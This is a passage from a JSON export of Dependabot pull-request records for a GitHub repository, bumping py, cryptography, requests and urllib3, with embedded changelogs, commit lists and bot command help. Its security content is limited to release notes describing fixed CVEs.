time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.8.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=py\u0026package-manager=pip\u0026previous-version=1.8.0\u0026new-version=1.11.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/BootcampersCollective/job-scraper/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/BootcampersCollective/job-scraper/pull/24","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/BootcampersCollective%2Fjob-scraper/issues/24","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/24/packages"},{"uuid":"2703325852","node_id":"PR_kwDOHEePGc6hIXqc","number":1648,"state":"closed","title":"build(deps): bump the pip group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python","stale"],"assignees":["melissamforbs"],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2025-08-21T08:26:58.000Z","author_association":"NONE","state_reason":null,"created_at":"2025-07-29T08:54:28.000Z","updated_at":"2025-08-21T08:26:58.000Z","time_to_close":1985550,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":4,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.19","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 4 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py), [requests](https://github.com/psf/requests) and [urllib3](https://github.com/urllib3/urllib3).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.19 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from 